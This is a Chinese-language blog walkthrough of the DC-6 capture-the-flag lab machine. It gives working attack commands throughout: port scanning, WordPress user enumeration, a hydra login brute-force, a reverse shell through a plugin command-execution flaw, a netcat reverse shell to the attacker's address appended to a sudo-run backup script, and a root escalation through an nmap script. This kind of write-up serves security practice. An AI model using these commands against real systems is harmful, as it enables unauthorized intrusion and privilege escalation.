DC-6

DC-6

信息收集

先把wordy加到host中

nmap -T4 -A -p 1-65535 192.168.211.138

又是wordpress,扫一下

wpscan --url http://wordy/ --enumerate u

admin
sarah
graham
mark
jens

用户爆破

hydra爆破一下

hydra -L/root/桌面/username.txt -P /home/zidian/rockyou.txt wordy http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:<title>invalido</title>' -F

不知道为什么,每次爆破的密码不一样。换wpscan再爆破试试

爆了200M数据还没爆出来,不知道他们是怎么爆的,我嫖了

mark : helpdesk01

命令执行

在该模块下可以直接进行命令执行

但是网页中,输入受限,在burp中进行,直接弹shell

反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

成功反弹shell

提权

WWW-DATA到graham

系统SUID,内核提权好像都不可以,在/home下不同用户目录中查找是否能找到一些有用的信息

在/home/mark/stuff/things-to-do.txt内

似乎是graham用户的密码,那我们尝试登陆,即可以从web权限提升到用户权限

登陆成功

graham到jens

sudo -l

意思是graham用户可以执行backups.sh,jens执行备份文件不需要密码,我们看一下权限

ls -alR /home/jens/backups.sh

cat /etc/group

确实graham用户可以修改backups.sh,那我们加入反弹shell命令进可执行文件中,让jens执行

echo 'nc -e /bin/bash 192.168.211.131 9999' >> backups.sh

sudo -u jens ./backups.sh

jens到root

jens

直接可以执行nmap

5.2.0 之后,nmap 可以通过执行脚本来提权

echo 'os.execute("/bin/sh")' > getshell
sudo nmap --script=getshell

获取flag

posted @ 2022-01-27 12:28  kar3a  阅读(69)  评论(0编辑  收藏  举报